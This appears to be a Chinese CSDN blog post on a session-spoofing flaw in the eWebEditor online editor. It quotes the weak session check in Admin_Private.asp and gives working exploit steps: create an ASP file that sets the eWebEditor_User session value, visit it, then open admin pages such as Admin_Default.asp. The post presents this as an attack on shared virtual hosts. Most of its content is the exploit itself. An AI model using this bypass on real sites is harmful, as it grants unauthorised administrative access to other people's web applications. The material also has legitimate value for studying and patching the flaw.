关闭

eWebEditor session欺骗漏洞

626人阅读 评论(0) 收藏 举报

eWebEditor在线编辑器
漏洞文件:Admin_Private.asp
漏洞语句:<%

If Session("eWebEditor_User") = "" Then
Response.Redirect "admin_login.asp"
Response.End
End If

只判断了session,没有判断cookies和路径的验证问题。
漏洞利用:
新建一个h4x0r.asp内容如下:
<%Session("eWebEditor_User") = "11111111"%>
访问h4x0r.asp,再访问后台任何文件,for example:Admin_Default.asp

漏洞影响:虚拟主机的克星. 

0
0

查看评论
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
    个人资料
    • 访问:17166次
    • 积分:223
    • 等级:
    • 排名:千里之外
    • 原创:4篇
    • 转载:10篇
    • 译文:0篇
    • 评论:1条
    文章存档
    最新评论